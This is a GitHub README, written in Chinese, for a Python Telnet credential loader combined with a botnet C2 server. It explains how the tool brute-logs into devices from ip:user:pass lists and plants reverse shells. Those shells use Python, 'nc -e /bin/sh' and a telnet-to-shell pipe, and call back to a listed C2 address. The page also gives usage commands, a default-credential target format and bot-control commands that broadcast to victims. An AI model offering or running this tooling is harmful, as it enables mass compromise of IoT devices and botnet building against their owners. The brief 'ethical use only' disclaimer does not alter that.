SleepTheGod/LateralusLoader
GitHub: SleepTheGod/LateralusLoader
一个纯Python实现的Telnet凭证加载器与僵尸网络C2服务器,可批量植入反弹Shell并集中控制受控主机。
Stars: 0 | Forks: 0
# LateralusLoader – Telnet 加载器与 C2
一个单一的 Python 脚本,融合了**多线程 Telnet 凭证加载器**和**全交互式僵尸网络 C2 服务器**。
加载器遍历 `ip:user:pass` 目标,通过 Telnet 进行身份验证,然后发送反弹 shell,依次尝试 Python3、Python2、netcat 和 telnet。C2 服务器接收这些 shell,让您实时控制每个僵尸主机。
## 截图
**帮助和使用界面**
*横幅、使用示例和可用选项。*
**加载器运行中**
*加载器向目标发送凭证和有效载荷,然后关闭连接。*
## 工具界面
运行工具时,您会看到 ASCII 横幅,与上面的截图中的完全相同。帮助界面(`python3 main.py --help`)会显示横幅,然后是:
```
Usage:
Loader mode: python3 main.py loader [--c2-ip IP] [--c2-port PORT]
C2 mode: python3 main.py c2 [PORT]
```
加载器控制台显示每个步骤:
```
[*] Sleep's Loader deployed – sending reverse shells
[*] Target list: telnet.txt → C2 at 173.249.20.58:4444
[+][+] Sending Username 10.0.0.5
[+][+] Sending Password 10.0.0.5
[+][+] Payload sent 10.0.0.5
```
C2 服务器为您提供交互式提示:
```
> list
Connected bots:
1 -> 192.168.1.10
2 -> 10.0.0.200
> broadcast uname -a
[Bot 1] Linux victim1 5.15.0-91-generic …
[Bot 2] Linux victim2 4.19.0-22-amd64 …
```
## 快速开始
```
git clone https://github.com/SleepTheGod/LateralusLoader.git
cd LateralusLoader
# 启动 C2 监听器(终端 1)
python3 main.py c2 4444
# 针对目标列表启动加载器(终端 2)
python3 main.py loader telnet_creds.txt --c2-ip --c2-port 4444
```
## 目标文件格式
纯文本文件。以 `#` 开头的行会被忽略。
每个有效行必须包含 `ip:username:password`:
```
# IoT 设备
192.168.1.100:admin:admin123
10.0.0.1:root:toor
172.16.0.5:user:letmein
```
## 有效载荷链
反弹 shell 命令是单行命令,按顺序尝试四种技术:
1. **Python3** 伪终端反弹 shell
2. **Python2** 备用方案
3. **Netcat**(`nc -e /bin/sh`)
4. **Telnet** 两阶段管道(`telnet IP PORT | /bin/sh | telnet IP PORT+1`)
整个链使用 `&` 放到后台,这样 Telnet 会话可以立即断开。
## C2 命令
| 命令 | 描述 |
|---------|-------------|
| `list` | 显示所有僵尸主机及其 IP |
| `broadcast ` | 在每个僵尸主机上运行命令 |
| `send ` | 在一个僵尸主机上运行命令 |
| `help` | 显示可用命令 |
| `exit` | 关闭服务器并断开所有僵尸主机连接 |
## 注意事项与免责声明
- **仅限道德使用** – 此工具仅用于授权的渗透测试和研究。
- 无外部依赖 – 可在任何带有 Python 3 的系统上运行。
- 所有连接都是普通 Telnet(端口 23);不支持 SSH。
## 许可证
MIT – 详见 `LICENSE` 全文。
## 作者 SleepTheGod
GitHub: [@SleepTheGod](https://github.com/SleepTheGod)
仓库: [LateralusLoader](https://github.com/SleepTheGod/LateralusLoader)
LinuxKernel: [LateralusOS](https://lateralus.dev/os/)
标签:Botnet, C2服务器, Go语言工具, HTTP工具, IP 地址批量处理, PE 加载器, Python恶意软件, Telnet, XXE攻击, 云存储安全, 僵尸网络, 免杀, 反弹shell, 后门, 命令执行, 搜索语句(dork), 无线安全, 横向移动, 编程规范, 网络安全, 网络扫描, 网络攻击工具, 自动化攻击, 载荷投递, 远程访问工具, 隐私保护